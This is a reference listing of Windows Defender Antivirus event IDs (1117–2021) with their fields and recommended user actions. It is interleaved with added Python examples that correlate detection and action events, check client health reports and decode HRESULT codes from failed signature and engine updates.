Symbolic name: MALWAREPROTECTION_STATE_MALWARE_ACTION_TAKEN

Message: The antimalware platform performed an action to protect your system from malware or other potentially unwanted software.

Description: Windows Defender Antivirus has taken action to protect this machine from malware or other potentially unwanted software. For more information please see the following:
  Name: <Threat name>
  ID: <Threat ID>
  Severity: <Severity>, for example:
    - Low
    - Moderate
    - High
    - Severe
  Category: <Category description>, for example, any threat or malware type.
  Path: <File path>
  Detection Origin: <Detection origin>, for example:
    - Unknown
    - Local computer
    - Network share
    - Internet
    - Incoming traffic
    - Outgoing traffic
  Detection Type: <Detection type>, for example:
    - Heuristics
    - Generic
    - Concrete
    - Dynamic signature
  Detection Source: <Detection source>, for example:
    - User: user initiated
    - System: system initiated
    - Real-time: real-time component initiated
    - IOAV: IE Downloads and Outlook Express Attachments initiated
    - NIS: Network inspection system
    - IEPROTECT: IE - IExtensionValidation; this protects against malicious webpage controls
    - Early Launch Antimalware (ELAM). This includes malware detected by the boot sequence
    - Remote attestation
    - Antimalware Scan Interface (AMSI). Primarily used to protect scripts (PS, VBS), though it can be invoked by third parties as well.
    - UAC
  User: <Domain>\<User>
  Process Name: <Process in the PID>
  Action: <Action>, for example:
    - Clean: The resource was cleaned
    - Quarantine: The resource was quarantined
    - Remove: The resource was deleted
    - Allow: The resource was allowed to execute/exist
    - User defined: User-defined action, which is normally one from this list of actions that the user has specified
    - No action: No action
    - Block: The resource was blocked from executing
  Action Status: <Description of additional actions>
  Error Code: <Error code>. Result code associated with threat status; standard HRESULT values.
  Error Description: <Error description>. Description of the error.
  Signature Version: <Definition version>
  Engine Version: <Antimalware Engine version>

User action: No action is necessary. Windows Defender Antivirus removed or quarantined a threat.

NOTE: Whenever Windows Defender Antivirus, Microsoft Security Essentials, Malicious Software Removal Tool, or System Center Endpoint Protection detects malware, it will restore the following system settings and services which the malware might have changed:
  - Default Internet Explorer or Microsoft Edge settings
  - User Access Control settings
  - Chrome settings
  - Boot Control Data
  - Regedit and Task Manager registry settings
  - Windows Update, Background Intelligent Transfer Service, and Remote Procedure Call service
  - Windows Operating System files
The above applies to the following client and server versions:

  OPERATING SYSTEM          OPERATING SYSTEM VERSION
  Client Operating System   Windows Vista (Service Pack 1 or Service Pack 2), Windows 7 and later
  Server Operating System   Windows Server 2008, Windows Server 2008 R2, Windows Server 2012, and Windows Server 2016

EVENT ID: 1118

Symbolic name: MALWAREPROTECTION_STATE_MALWARE_ACTION_FAILED

Message: The antimalware platform attempted to perform an action to protect your system from malware or other potentially unwanted software, but the action failed.

Description: Windows Defender Antivirus has encountered a non-critical error when taking action on malware or other potentially unwanted software. For more information please see the following:
  Name: <Threat name>
  ID: <Threat ID>
  Severity: <Severity>, for example:
    - Low
    - Moderate
    - High
    - Severe
  Category: <Category description>, for example, any threat or malware type.
  Path: <File path>
  Detection Origin: <Detection origin>, for example:
    - Unknown
    - Local computer
    - Network share
    - Internet
    - Incoming traffic
    - Outgoing traffic
  Detection Type: <Detection type>, for example:
    - Heuristics
    - Generic
    - Concrete
    - Dynamic signature
  Detection Source: <Detection source>, for example:
    - User: user initiated
    - System: system initiated
    - Real-time: real-time component initiated
    - IOAV: IE Downloads and Outlook Express Attachments initiated
    - NIS: Network inspection system
    - IEPROTECT: IE - IExtensionValidation; this protects against malicious webpage controls
    - Early Launch Antimalware (ELAM). This includes malware detected by the boot sequence
    - Remote attestation
    - Antimalware Scan Interface (AMSI). Primarily used to protect scripts (PS, VBS), though it can be invoked by third parties as well.
    - UAC
  User: <Domain>\<User>
  Process Name: <Process in the PID>
  Action: <Action>, for example:
    - Clean: The resource was cleaned
    - Quarantine: The resource was quarantined
    - Remove: The resource was deleted
    - Allow: The resource was allowed to execute/exist
    - User defined: User-defined action, which is normally one from this list of actions that the user has specified
    - No action: No action
    - Block: The resource was blocked from executing
  Action Status: <Description of additional actions>
  Error Code: <Error code>. Result code associated with threat status; standard HRESULT values.
  Error Description: <Error description>. Description of the error.
  Signature Version: <Definition version>
  Engine Version: <Antimalware Engine version>

User action: No action is necessary. Windows Defender Antivirus failed to complete a task related to the malware remediation. This is not a critical failure.

EVENT ID: 1119

Symbolic name: MALWAREPROTECTION_STATE_MALWARE_ACTION_CRITICALLY_FAILED

Message: The antimalware platform encountered a critical error when trying to take action on malware or other potentially unwanted software. There are more details in the event message.

Description: Windows Defender Antivirus has encountered a critical error when taking action on malware or other potentially unwanted software. For more information please see the following:
  Name: <Threat name>
  ID: <Threat ID>
  Severity: <Severity>, for example:
    - Low
    - Moderate
    - High
    - Severe
  Category: <Category description>, for example, any threat or malware type.
  Path: <File path>
  Detection Origin: <Detection origin>, for example:
    - Unknown
    - Local computer
    - Network share
    - Internet
    - Incoming traffic
    - Outgoing traffic
  Detection Type: <Detection type>, for example:
    - Heuristics
    - Generic
    - Concrete
    - Dynamic signature
  Detection Source: <Detection source>, for example:
    - User: user initiated
    - System: system initiated
    - Real-time: real-time component initiated
    - IOAV: IE Downloads and Outlook Express Attachments initiated
    - NIS: Network inspection system
    - IEPROTECT: IE - IExtensionValidation; this protects against malicious webpage controls
    - Early Launch Antimalware (ELAM). This includes malware detected by the boot sequence
    - Remote attestation
    - Antimalware Scan Interface (AMSI). Primarily used to protect scripts (PS, VBS), though it can be invoked by third parties as well.
    - UAC
  User: <Domain>\<User>
  Process Name: <Process in the PID>
  Action: <Action>, for example:
    - Clean: The resource was cleaned
    - Quarantine: The resource was quarantined
    - Remove: The resource was deleted
    - Allow: The resource was allowed to execute/exist
    - User defined: User-defined action, which is normally one from this list of actions that the user has specified
    - No action: No action
    - Block: The resource was blocked from executing
  Action Status: <Description of additional actions>
  Error Code: <Error code>. Result code associated with threat status; standard HRESULT values.
  Error Description: <Error description>. Description of the error.
  Signature Version: <Definition version>
  Engine Version: <Antimalware Engine version>

User action: The Windows Defender Antivirus client encountered this error due to critical issues. The endpoint might not be protected. Review the error description, then follow the relevant user action steps below.

  ACTION       USER ACTION
  Remove       Update the definitions, then verify that the removal was successful.
  Clean        Update the definitions, then verify that the remediation was successful.
  Quarantine   Update the definitions and verify that the user has permission to access the necessary resources.
  Allow        Verify that the user has permission to access the necessary resources.

If this event persists:
1. Run the scan again.
2. If it fails in the same way, go to the Microsoft Support site and enter the error number in the Search box to look up the error code.
3. Contact Microsoft Technical Support.
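Events 1116 through 1119 are only useful in pairs: a 1116 detection should be followed by a 1117, and a 1118 or 1119 tells you which action failed and with what HRESULT. The script below is an added example, not Microsoft's code, that does that pairing over the rendered message text of these events (what `Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-Windows Defender/Operational'; Id=1116,1117,1118,1119}` exposes as `.Message`). It reports detections that no action event closed, and for each 1118/1119 it attaches the user action from the 1119 table above. The sample events are constructed to follow the field layout documented on this page; threat IDs other than the EICAR test file, paths and usernames are illustrative.

```python
"""Correlate Windows Defender Antivirus detections (1116) with action events (1117-1119).

Added example, not Microsoft's code. Input is the rendered message text of the
events, oldest first; output is the list of detections with no action event and
the list of failed actions with the recommended user action. Sample events are
constructed to follow the field layout documented on this page.
"""
import re

# User action per failed action, from the 1119 table on this page.
USER_ACTION = {
    "Remove": "Update the definitions, then verify that the removal was successful.",
    "Clean": "Update the definitions, then verify that the remediation was successful.",
    "Quarantine": "Update the definitions and verify that the user has permission "
                  "to access the necessary resources.",
    "Allow": "Verify that the user has permission to access the necessary resources.",
}
FALLBACK_ACTION = ("Review the error description; if the event persists, run the scan "
                   "again and look up the error code on the Microsoft Support site.")

# One 'Field: value' line. Keys are letters and spaces only, so values that
# contain ':' (file: URIs, threat names, timestamps) are not split again.
FIELD_RE = re.compile(r"^\s*(?P<key>[A-Za-z][A-Za-z ]*?):\s*(?P<value>.*)$")


def parse_message(text):
    """Return the non-empty 'Field: value' lines of a rendered message as a dict."""
    matches = (FIELD_RE.match(line) for line in text.splitlines())
    return {m.group("key").strip(): m.group("value").strip()
            for m in matches if m and m.group("value").strip()}


def triage(events):
    """events: iterable of (event_id, time_created, message_text), oldest first.

    Returns (unactioned, failures). A detection and its action event are matched
    on Threat ID plus Path, the two fields both event types carry.
    """
    open_detections = {}   # (threat id, path) -> detection record
    failures = []
    for event_id, when, text in events:
        f = parse_message(text)
        key = (f.get("ID"), f.get("Path"))
        if event_id == 1116:
            open_detections[key] = {"time": when, "threat": f.get("Name"),
                                    "severity": f.get("Severity"), "path": f.get("Path")}
        elif event_id in (1117, 1118, 1119):
            open_detections.pop(key, None)          # the detection was acted on
            if event_id != 1117:                    # 1118 non-critical, 1119 critical
                action = f.get("Action", "")
                failures.append({
                    "event_id": event_id, "critical": event_id == 1119, "time": when,
                    "threat": f.get("Name"), "path": f.get("Path"), "action": action,
                    "error_code": f.get("Error Code"), "error": f.get("Error Description"),
                    "user_action": USER_ACTION.get(action, FALLBACK_ACTION),
                })
    return list(open_detections.values()), failures


SAMPLE_EVENTS = [  # constructed sample, oldest first
    (1116, "2019-03-01T10:00:00Z",
     "Windows Defender Antivirus has detected malware or other potentially unwanted software.\n"
     " Name: Virus:DOS/EICAR_Test_File\n ID: 2147519003\n Severity: Severe\n Category: Virus\n"
     " Path: file:_C:\\Users\\alice\\Downloads\\eicar.com\n Detection Origin: Internet\n"
     " Detection Type: Concrete\n Detection Source: Real-time\n User: CONTOSO\\alice\n"
     " Process Name: C:\\Windows\\explorer.exe\n Signature Version: 1.289.0.0\n Engine Version: 1.1.15700.0\n"),
    (1117, "2019-03-01T10:00:02Z",
     "Windows Defender Antivirus has taken action to protect this machine from malware or other potentially unwanted software.\n"
     " Name: Virus:DOS/EICAR_Test_File\n ID: 2147519003\n Path: file:_C:\\Users\\alice\\Downloads\\eicar.com\n"
     " Action: Quarantine\n Action Status: No additional actions required\n Error Code: 0x00000000\n"),
    (1116, "2019-03-01T11:30:00Z",
     "Windows Defender Antivirus has detected malware or other potentially unwanted software.\n"
     " Name: Trojan:Win32/Example!sample\n ID: 2147700000\n Severity: Severe\n Category: Trojan\n"
     " Path: file:_C:\\Temp\\dropper.exe\n Detection Origin: Local computer\n Detection Source: System\n"),
    (1119, "2019-03-01T11:30:05Z",
     "Windows Defender Antivirus has encountered a critical error when taking action on malware or other potentially unwanted software.\n"
     " Name: Trojan:Win32/Example!sample\n ID: 2147700000\n Path: file:_C:\\Temp\\dropper.exe\n"
     " Action: Remove\n Error Code: 0x80070005\n Error Description: Access is denied.\n"),
    (1116, "2019-03-01T12:00:00Z",
     "Windows Defender Antivirus has detected malware or other potentially unwanted software.\n"
     " Name: PUA:Win32/Example!sample\n ID: 2147700001\n Severity: Low\n Category: Potentially Unwanted Software\n"
     " Path: file:_C:\\Users\\alice\\Downloads\\bundle.exe\n Detection Source: User\n"),
]

if __name__ == "__main__":
    unactioned, failures = triage(SAMPLE_EVENTS)
    for d in unactioned:
        print(f"OPEN      {d['time']}  {d['threat']}  {d['path']}")
    for x in failures:
        print(f"{'CRITICAL' if x['critical'] else 'FAILED':9} {x['time']}  {x['threat']}  "
              f"action={x['action']} {x['error_code']}\n          -> {x['user_action']}")
```

The match key deliberately includes the path: the same threat ID can be detected in several files, and only the action event carrying the same path closes a given detection. A detection that stays open after a reasonable delay is worth the same attention as a 1119, because the page's "no action is required" guidance for 1116 assumes the action event does arrive.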

EVENT ID: 1120

Symbolic name: MALWAREPROTECTION_THREAT_HASH

Message: Windows Defender Antivirus has deduced the hashes for a threat resource.

Description: Windows Defender Antivirus client is up and running in a healthy state.
  Current Platform Version: <Current platform version>
  Threat Resource Path: <Path>
  Hashes: <Hashes>

Note: This event will only be logged if the following policy is set: ThreatFileHashLogging unsigned.

EVENT ID: 1150

Symbolic name: MALWAREPROTECTION_SERVICE_HEALTHY

Message: If your antimalware platform reports status to a monitoring platform, this event indicates that the antimalware platform is running and in a healthy state.

Description: Windows Defender Antivirus client is up and running in a healthy state.
  Platform Version: <Current platform version>
  Signature Version: <Definition version>
  Engine Version: <Antimalware Engine version>

User action: No action is necessary. The Windows Defender Antivirus client is in a healthy state. This event is reported on an hourly basis.

EVENT ID: 1151

Symbolic name: MALWAREPROTECTION_SERVICE_HEALTH_REPORT

Message: Endpoint Protection client health report (time in UTC)

Description: Antivirus client health report.
  Platform Version: <Current platform version>
  Engine Version: <Antimalware Engine version>
  Network Realtime Inspection engine version: <Network Realtime Inspection engine version>
  Antivirus signature version: <Antivirus signature version>
  Antispyware signature version: <Antispyware signature version>
  Network Realtime Inspection signature version: <Network Realtime Inspection signature version>
  RTP state: <Realtime protection state> (Enabled or Disabled)
  OA state: <On Access state> (Enabled or Disabled)
  IOAV state: <IE Downloads and Outlook Express Attachments state> (Enabled or Disabled)
  BM state: <Behavior Monitoring state> (Enabled or Disabled)
  Antivirus signature age: <Antivirus signature age> (in days)
  Antispyware signature age: <Antispyware signature age> (in days)
  Last quick scan age: <Last quick scan age> (in days)
  Last full scan age: <Last full scan age> (in days)
  Antivirus signature creation time: <Antivirus signature creation time>
  Antispyware signature creation time: <Antispyware signature creation time>
  Last quick scan start time: <Last quick scan start time>
  Last quick scan end time: <Last quick scan end time>
  Last quick scan source: <Last quick scan source> (0 = scan didn't run, 1 = user initiated, 2 = system initiated)
  Last full scan start time: <Last full scan start time>
  Last full scan end time: <Last full scan end time>
  Last full scan source: <Last full scan source> (0 = scan didn't run, 1 = user initiated, 2 = system initiated)
  Product status: For internal troubleshooting
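The 1151 health report is the one event that carries the whole protection posture of an endpoint in a single record, so it is the natural thing to evaluate in a monitoring pipeline. The script below is an added example, not Microsoft's code: it parses the `Field: value` lines of a rendered 1151 message (the `.Message` of `Get-WinEvent` for that event ID) and returns findings for a disabled real-time protection component, signature or scan ages above a threshold, and a scan source of 0, which the field description above defines as "scan didn't run". The age thresholds are this example's own assumptions, not values from the page, and the sample report, including its version numbers, is constructed.

```python
"""Evaluate a Windows Defender Antivirus client health report (event 1151).

Added example, not Microsoft's code. Thresholds are assumptions for the example;
the sample report is constructed to follow the 1151 field layout on this page.
"""
import re

FIELD_RE = re.compile(r"^\s*(?P<key>[A-Za-z][A-Za-z ]*?):\s*(?P<value>.*)$")
SCAN_SOURCE = {"0": "scan didn't run", "1": "user initiated", "2": "system initiated"}
PROTECTION_STATES = ("RTP state", "OA state", "IOAV state", "BM state")


def parse_report(text):
    """Return the non-empty 'Field: value' lines of the report as a dict."""
    matches = (FIELD_RE.match(line) for line in text.splitlines())
    return {m.group("key").strip(): m.group("value").strip()
            for m in matches if m and m.group("value").strip()}


def _days(value):
    """'9', '9 days' or '9 (in days)' -> 9; missing or non-numeric -> None."""
    m = re.match(r"\s*(\d+)", value or "")
    return int(m.group(1)) if m else None


def evaluate_health(fields, max_signature_age=3, max_quick_scan_age=7, max_full_scan_age=30):
    """Return a list of human-readable findings; an empty list means healthy."""
    findings = []
    # Every real-time protection component the report covers must be enabled.
    for key in PROTECTION_STATES:
        if fields.get(key) != "Enabled":
            findings.append(f"{key} is {fields.get(key, 'missing')}")
    # Ages are reported in days; a missing age counts as a failure, not as zero.
    for key, limit in (("Antivirus signature age", max_signature_age),
                       ("Antispyware signature age", max_signature_age),
                       ("Last quick scan age", max_quick_scan_age),
                       ("Last full scan age", max_full_scan_age)):
        age = _days(fields.get(key))
        if age is None or age > limit:
            findings.append(f"{key} is {fields.get(key, 'missing')} (limit {limit} days)")
    # Source 0 means the scan never ran, whatever the reported age says.
    for key in ("Last quick scan source", "Last full scan source"):
        if fields.get(key) == "0":
            findings.append(f"{key} is 0 ({SCAN_SOURCE['0']})")
    return findings


SAMPLE_REPORT = """Endpoint Protection client health report (time in UTC)
 Platform Version: 4.18.1902.2
 Engine Version: 1.1.15700.0
 Network Realtime Inspection engine version: 1.1.15700.0
 Antivirus signature version: 1.289.0.0
 Antispyware signature version: 1.289.0.0
 Network Realtime Inspection signature version: 1.289.0.0
 RTP state: Enabled
 OA state: Enabled
 IOAV state: Enabled
 BM state: Disabled
 Antivirus signature age: 9
 Antispyware signature age: 9
 Last quick scan age: 12
 Last full scan age: 40
 Antivirus signature creation time: 2019-02-20T03:11:00Z
 Antispyware signature creation time: 2019-02-20T03:11:00Z
 Last quick scan start time: 2019-02-17T02:00:00Z
 Last quick scan end time: 2019-02-17T02:09:31Z
 Last quick scan source: 2
 Last full scan source: 0
 Product status: 0
"""  # constructed sample; versions and timestamps are illustrative

if __name__ == "__main__":
    for finding in evaluate_health(parse_report(SAMPLE_REPORT)) or ["healthy"]:
        print(finding)
```

Treating a missing age as a failure rather than as zero matters in practice: an endpoint whose report lacks the field is one you know nothing about, which is the opposite of compliant.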

EVENT ID: 2000

Symbolic name: MALWAREPROTECTION_SIGNATURE_UPDATED

Message: The antimalware definitions updated successfully.

Description: Antivirus signature version has been updated.
  Current Signature Version: <Current signature version>
  Previous Signature Version: <Previous signature version>
  Signature Type: <Signature type>, for example:
    - Antivirus
    - Antispyware
    - Antimalware
    - Network Inspection System
  Update Type: <Update type>, either Full or Delta.
  User: <Domain>\<User>
  Current Engine Version: <Current engine version>
  Previous Engine Version: <Previous engine version>

User action: No action is necessary. The Windows Defender Antivirus client is in a healthy state. This event is reported when signatures are successfully updated.

EVENT ID: 2001

Symbolic name: MALWAREPROTECTION_SIGNATURE_UPDATE_FAILED

Message: The antimalware definition update failed.

Description: Windows Defender Antivirus has encountered an error trying to update signatures.
  New Signature Version: <New version number>
  Previous Signature Version: <Previous signature version>
  Update Source: <Update source>, for example:
    - Signature update folder
    - Internal definition update server
    - Microsoft Update Server
    - File share
    - Microsoft Malware Protection Center (MMPC)
  Update Stage: <Update stage>, for example:
    - Search
    - Download
    - Install
  Source Path: File share name for Universal Naming Convention (UNC); server name for Windows Server Update Services (WSUS)/Microsoft Update/ADL.
  Signature Type: <Signature type>, for example:
    - Antivirus
    - Antispyware
    - Antimalware
    - Network Inspection System
  Update Type: <Update type>, either Full or Delta.
  User: <Domain>\<User>
  Current Engine Version: <Current engine version>
  Previous Engine Version: <Previous engine version>
  Error Code: <Error code>. Result code associated with threat status; standard HRESULT values.
  Error Description: <Error description>. Description of the error.

User action: This error occurs when there is a problem updating definitions. To troubleshoot this event:
1. Update definitions and force a rescan directly on the endpoint.
2. Review the entries in the %Windir%\WindowsUpdate.log file for more information about this error.
3. Contact Microsoft Technical Support.

EVENT ID: 2002

Symbolic name: MALWAREPROTECTION_ENGINE_UPDATED

Message: The antimalware engine updated successfully.


Description: Windows Defender Antivirus engine version has been updated.
  Current Engine Version: <Current engine version>
  Previous Engine Version: <Previous engine version>
  Engine Type: <Engine type>, either antimalware engine or Network Inspection System engine.
  User: <Domain>\<User>

User action: No action is necessary. The Windows Defender Antivirus client is in a healthy state. This event is reported when the antimalware engine is successfully updated.

EVENT ID: 2003

Symbolic name: MALWAREPROTECTION_ENGINE_UPDATE_FAILED

Message: The antimalware engine update failed.

Description: Windows Defender Antivirus has encountered an error trying to update the engine.
  New Engine Version:
  Previous Engine Version: <Previous engine version>
  Engine Type: <Engine type>, either antimalware engine or Network Inspection System engine.
  User: <Domain>\<User>
  Error Code: <Error code>. Result code associated with threat status; standard HRESULT values.
  Error Description: <Error description>. Description of the error.

User action: The Windows Defender Antivirus client update failed. This event occurs when the client fails to update itself. It is usually due to an interruption in network connectivity during an update. To troubleshoot this event:
1. Update definitions and force a rescan directly on the endpoint.
2. Contact Microsoft Technical Support.

EVENT ID: 2004

Symbolic name: MALWAREPROTECTION_SIGNATURE_REVERSION


Message: There was a problem loading antimalware definitions. The antimalware engine will attempt to load the last-known good set of definitions.

Description: Windows Defender Antivirus has encountered an error trying to load signatures and will attempt reverting back to a known-good set of signatures.
  Signatures Attempted:
  Error Code: <Error code>. Result code associated with threat status; standard HRESULT values.
  Error Description: <Error description>. Description of the error.
  Signature Version: <Definition version>
  Engine Version: <Antimalware engine version>

User action: The Windows Defender Antivirus client attempted to download and install the latest definitions file and failed. This error can occur when the client encounters an error while trying to load the definitions, or if the file is corrupt. Windows Defender Antivirus will attempt to revert back to a known-good set of definitions. To troubleshoot this event:
1. Restart the computer and try again.
2. Download the latest definitions from the Windows Defender Security Intelligence site. Note: The size of the definitions file downloaded from the site can exceed 60 MB and should not be used as a long-term solution for updating definitions.
3. Contact Microsoft Technical Support.
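The update events 2000 to 2004 share two things that are worth automating: the Error Code field, which the descriptions above say holds standard HRESULT values, and a sequence that matters (a 2004 reversion after the last successful 2000 means the endpoint is running on older signatures than the last 2000 reported). The script below is an added example, not Microsoft's code. It decodes the HRESULT into its failure bit, facility and code and names the Win32 code when the facility is FACILITY_WIN32 (7), which is the common case for the network and file errors behind 2001/2003/2004; codes in other facilities are product-specific and are left unnamed. It then groups failures by update source and stage so that two 2001 events from the same WSUS download stage show up as one recurring problem rather than two alerts. Sample events, server names and version numbers are constructed.

```python
"""Triage Windows Defender Antivirus signature/engine update events (2000-2004).

Added example, not Microsoft's code. Input is the rendered message text of the
events, oldest first. Sample events are constructed to follow the field layout
documented on this page.
"""
import re

FIELD_RE = re.compile(r"^\s*(?P<key>[A-Za-z][A-Za-z ]*?):\s*(?P<value>.*)$")

# A few Win32 codes (HRESULT facility 7) commonly wrapped in update failures.
WIN32_CODES = {
    2: "ERROR_FILE_NOT_FOUND", 5: "ERROR_ACCESS_DENIED", 13: "ERROR_INVALID_DATA",
    32: "ERROR_SHARING_VIOLATION", 1460: "ERROR_TIMEOUT",
    12002: "ERROR_WINHTTP_TIMEOUT", 12007: "ERROR_WINHTTP_NAME_NOT_RESOLVED",
    12029: "ERROR_WINHTTP_CANNOT_CONNECT",
}


def parse_message(text):
    """Return the non-empty 'Field: value' lines of a rendered message as a dict."""
    matches = (FIELD_RE.match(line) for line in text.splitlines())
    return {m.group("key").strip(): m.group("value").strip()
            for m in matches if m and m.group("value").strip()}


def decode_hresult(code):
    """Split an HRESULT such as '0x80072EE2' into severity, facility and code.

    Bit 31 set means failure, bits 16-26 are the facility, bits 0-15 the code.
    Facility 7 (FACILITY_WIN32) wraps a Win32 error, so 0x8007xxxx is looked up
    in WIN32_CODES; other facilities are product-specific and stay unnamed.
    """
    value = int(str(code), 16) & 0xFFFFFFFF
    facility = (value >> 16) & 0x7FF
    low = value & 0xFFFF
    return {"hresult": f"0x{value:08X}", "failed": bool(value >> 31),
            "facility": facility, "code": low,
            "name": WIN32_CODES.get(low) if facility == 7 else None}


def triage_updates(events):
    """events: iterable of (event_id, time_created, message_text), oldest first."""
    summary = {"signature_version": None, "engine_version": None,
               "reverted_since_last_success": False, "failures": {}}
    for event_id, when, text in events:
        f = parse_message(text)
        if event_id == 2000:                          # signatures updated
            summary["signature_version"] = f.get("Current Signature Version")
            summary["reverted_since_last_success"] = False
        elif event_id == 2002:                        # engine updated
            summary["engine_version"] = f.get("Current Engine Version")
        elif event_id in (2001, 2003, 2004):          # update failed / reversion
            if event_id == 2004:
                summary["reverted_since_last_success"] = True
            key = (event_id, f.get("Update Source", "-"), f.get("Update Stage", "-"))
            entry = summary["failures"].setdefault(key, {"count": 0, "first": when})
            entry.update(count=entry["count"] + 1, last=when,
                         error=decode_hresult(f.get("Error Code", "0x0")),
                         description=f.get("Error Description"))
    return summary


FAILED_DOWNLOAD = (  # constructed 2001 message
    "Windows Defender Antivirus has encountered an error trying to update signatures.\n"
    " New Signature Version: \n Previous Signature Version: 1.289.0.0\n"
    " Update Source: Internal definition update server\n Update Stage: Download\n"
    " Source Path: http://wsus.corp.example:8530\n Signature Type: Antivirus\n Update Type: Full\n"
    " User: NT AUTHORITY\\SYSTEM\n Current Engine Version: 1.1.15700.0\n"
    " Error Code: 0x80072EE2\n Error Description: The operation timed out\n")
SAMPLE_EVENTS = [  # constructed sample, oldest first
    (2000, "2019-03-01T06:00:00Z",
     "Antivirus signature version has been updated.\n Current Signature Version: 1.289.0.0\n"
     " Previous Signature Version: 1.288.9.0\n Signature Type: Antivirus\n Update Type: Delta\n"),
    (2002, "2019-03-01T06:00:05Z",
     "Windows Defender Antivirus engine version has been updated.\n Current Engine Version: 1.1.15700.0\n"
     " Previous Engine Version: 1.1.15600.4\n Engine Type: antimalware engine\n"),
    (2001, "2019-03-01T12:00:00Z", FAILED_DOWNLOAD),
    (2001, "2019-03-01T18:00:00Z", FAILED_DOWNLOAD),
    (2004, "2019-03-02T00:00:00Z",
     "Windows Defender Antivirus has encountered an error trying to load signatures and will attempt reverting back to a known-good set of signatures.\n"
     " Signatures Attempted: \n Error Code: 0x8007000D\n Error Description: The data is invalid.\n"
     " Signature Version: 1.289.0.0\n Engine Version: 1.1.15700.0\n"),
]

if __name__ == "__main__":
    s = triage_updates(SAMPLE_EVENTS)
    print(f"signatures {s['signature_version']}  engine {s['engine_version']}  "
          f"reverted since last success: {s['reverted_since_last_success']}")
    for (eid, source, stage), e in s["failures"].items():
        print(f"{eid} {source}/{stage}: {e['count']}x {e['error']['hresult']} "
              f"{e['error']['name'] or 'facility ' + str(e['error']['facility'])}  {e['description']}")
```

The two 2001 failures collapse into one entry with `count` 2 and a decoded `ERROR_WINHTTP_TIMEOUT`, which points at the WSUS download path rather than at the client, while the 2004 reversion decodes to `ERROR_INVALID_DATA`, matching the corrupt-file case the user action for 2004 describes.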

EVENT ID: 2005

Symbolic name: MALWAREPROTECTION_ENGINE_UPDATE_PLATFORMOUTOFDATE

Message: The antimalware engine failed to load because the antimalware platform is out of date. The antimalware platform will load the last-known good antimalware engine and attempt to update.

Description: Windows Defender Antivirus could not load the antimalware engine because the current platform version is not supported. Windows Defender Antivirus will revert back to the last known-good engine and a platform update will be attempted.
  Current Platform Version: <Current platform version>

EVENT ID: 2006

Symbolic name: MALWAREPROTECTION_PLATFORM_UPDATE_FAILED

Message: The platform update failed.


Description: Windows Defender Antivirus has encountered an error trying to update the platform.
  Current Platform Version: <Current platform version>
  Error Code: <Error code>. Result code associated with threat status; standard HRESULT values.
  Error Description: <Error description>. Description of the error.

EVENT ID: 2007


Symbolic name: MALWAREPROTECTION_PLATFORM_ALMOSTOUTOFDATE

Message: The platform will soon be out of date. Download the latest platform to maintain up-to-date protection.

Description: Windows Defender Antivirus will soon require a newer platform version to support future versions of the antimalware engine. Download the latest Windows Defender Antivirus platform to maintain the best level of protection available.
  Current Platform Version: <Current platform version>

EVENT ID: 2010

Symbolic name: MALWAREPROTECTION_SIGNATURE_FASTPATH_UPDATED

Message: The antimalware engine used the Dynamic Signature Service to get additional definitions.

Description: Windows Defender Antivirus used the Dynamic Signature Service to retrieve additional signatures to help protect your machine.
  Current Signature Version: <Current signature version>
  Signature Type: <Signature type>, for example:
    - Antivirus
    - Antispyware
    - Antimalware
    - Network Inspection System
  Current Engine Version: <Current engine version>
  Dynamic Signature Type: <Dynamic signature type>, for example:
    - Version
    - Timestamp
    - No limit
    - Duration
  Persistence Path: <Path>
  Dynamic Signature Version: <Version number>
  Dynamic Signature Compilation Timestamp: <Timestamp>
  Persistence Limit Type: <Persistence limit type>, for example:
    - VDM version
    - Timestamp
    - No limit
  Persistence Limit: Persistence limit of the fastpath signature.

EVENT ID: 2011

Symbolic name: MALWAREPROTECTION_SIGNATURE_FASTPATH_DELETED

Message: The Dynamic Signature Service deleted the out-of-date dynamic definitions.

Description: Windows Defender Antivirus used the Dynamic Signature Service to discard obsolete signatures.
  Current Signature Version: <Current signature version>
  Signature Type: <Signature type>, for example:
    - Antivirus
    - Antispyware
    - Antimalware
    - Network Inspection System
  Current Engine Version: <Current engine version>
  Dynamic Signature Type: <Dynamic signature type>, for example:
    - Version
    - Timestamp
    - No limit
    - Duration
  Persistence Path: <Path>
  Dynamic Signature Version: <Version number>
  Dynamic Signature Compilation Timestamp: <Timestamp>
  Removal Reason:
  Persistence Limit Type: <Persistence limit type>, for example:
    - VDM version
    - Timestamp
    - No limit
  Persistence Limit: Persistence limit of the fastpath signature.

User action: No action is necessary. The Windows Defender Antivirus client is in a healthy state. This event is reported when the Dynamic Signature Service successfully deletes out-of-date dynamic definitions.

EVENT ID: 2012

Symbolic name: MALWAREPROTECTION_SIGNATURE_FASTPATH_UPDATE_FAILED

Message: The antimalware engine encountered an error when trying to use the Dynamic Signature Service.

Description: Windows Defender Antivirus has encountered an error trying to use the Dynamic Signature Service.
  Current Signature Version: <Current signature version>
  Signature Type: <Signature type>, for example:
    - Antivirus
    - Antispyware
    - Antimalware
    - Network Inspection System
  Current Engine Version: <Current engine version>
  Error Code: <Error code>. Result code associated with threat status; standard HRESULT values.
  Error Description: <Error description>. Description of the error.
  Dynamic Signature Type: <Dynamic signature type>, for example:
    - Version
    - Timestamp
    - No limit
    - Duration
  Persistence Path: <Path>
  Dynamic Signature Version: <Version number>
  Dynamic Signature Compilation Timestamp: <Timestamp>
  Persistence Limit Type: <Persistence limit type>, for example:
    - VDM version
    - Timestamp
    - No limit
  Persistence Limit: Persistence limit of the fastpath signature.

User action: Check your Internet connectivity settings.

EVENT ID: 2013

Symbolic name: MALWAREPROTECTION_SIGNATURE_FASTPATH_DELETED_ALL

Message: The Dynamic Signature Service deleted all dynamic definitions.

Description: Windows Defender Antivirus discarded all Dynamic Signature Service signatures.
  Current Signature Version: <Current signature version>

EVENT ID: 2020

Symbolic name: MALWAREPROTECTION_CLOUD_CLEAN_RESTORE_FILE_DOWNLOADED

Message: The antimalware engine downloaded a clean file.

Description: Windows Defender Antivirus downloaded a clean file.
  Filename: <File name>. Name of the file.
  Current Signature Version: <Current signature version>
  Current Engine Version: <Current engine version>

EVENT ID: 2021

Symbolic name: MALWAREPROTECTION_CLOUD_CLEAN_RESTORE_FILE_DOWNLOAD_FAILED

Message: The antimalware engine failed to download a clean file.

Description: Windows Defender Antivirus has encountered an error trying to download a clean file.
  Filename: <File name>. Name of the file.
  Current Signature Version: <Current signature version>
  Current Engine Version: <Current engine version>
  Error Code: <Error code>. Result code associated with threat status; standard HRESULT values.
  Error Description: <Error description>. Description of the error.

